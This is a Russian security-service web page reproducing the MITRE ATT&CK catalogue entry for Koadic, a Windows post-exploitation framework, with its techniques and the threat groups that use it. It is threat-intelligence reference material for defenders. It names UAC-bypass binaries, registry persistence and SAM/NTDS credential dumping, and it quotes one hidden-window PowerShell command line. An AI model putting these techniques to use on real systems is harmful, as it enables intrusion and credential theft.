Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Инструмент Koadic
Каталоги
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
Риски
Каталоги
MITRE ATT&CK
Инструмент
Koadic
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Koadic

Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.(Citation: Github Koadic)(Citation: Palo Alto Sofacy 06-2018)(Citation: MalwareBytes LazyScripter Feb 2021)
ID: S0250
Type: TOOL
Platforms: Windows
Version: 2.0
Created: 17 Oct 2018
Last Modified: 06 Apr 2022

Techniques Used
Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

Koadic has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.(Citation: Github Koadic)
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Koadic has used HTTP for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021)
Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Koadic has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.(Citation: MalwareBytes LazyScripter Feb 2021)
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Koadic has used PowerShell to establish persistence.(Citation: MalwareBytes LazyScripter Feb 2021)

.003 Command and Scripting Interpreter: Windows Command Shell

Koadic can open an interactive command-shell to perform command line functions on victim machines. Koadic performs most of its operations using Windows Script Host (Jscript) and to run arbitrary shellcode.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)

.005 Command and Scripting Interpreter: Visual Basic

Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .(Citation: Github Koadic)

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Koadic can use SSL and TLS for communications.(Citation: Github Koadic)
Enterprise T1564 .003 Hide Artifacts: Hidden Window

Koadic has used the command Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden to hide its window.(Citation: MalwareBytes LazyScripter Feb 2021)
Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Koadic can gather hashed passwords by dumping SAM/SECURITY hive.(Citation: Github Koadic)
.003 OS Credential Dumping: NTDS

Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

Koadic can perform process injection by using a reflective DLL.(Citation: Github Koadic)
Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Koadic can enable remote desktop on the victim's machine.(Citation: Github Koadic)
Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Koadic has used scheduled tasks to add persistence.(Citation: MalwareBytes LazyScripter Feb 2021)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)

.010 System Binary Proxy Execution: Regsvr32

Koadic can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)

.011 System Binary Proxy Execution: Rundll32

Koadic can use Rundll32 to execute additional payloads.(Citation: Github Koadic)

Enterprise T1569 .002 System Services: Service Execution

Koadic can run a command on another machine using PsExec.(Citation: Github Koadic)

Groups That Use This Software
ID Name References
G0007 APT28

(Citation: Palo Alto Sofacy 06-2018)

G0140 LazyScripter

(Citation: MalwareBytes LazyScripter Feb 2021)

G0121 Sidewinder

(Citation: ATT Sidewinder January 2021)

G0069 MuddyWater

(Citation: Reaqta MuddyWater November 2017) (Citation: TrendMicro POWERSTATS V3 June 2019)

References

  1. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
  2. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  3. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  4. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
  5. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  6. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.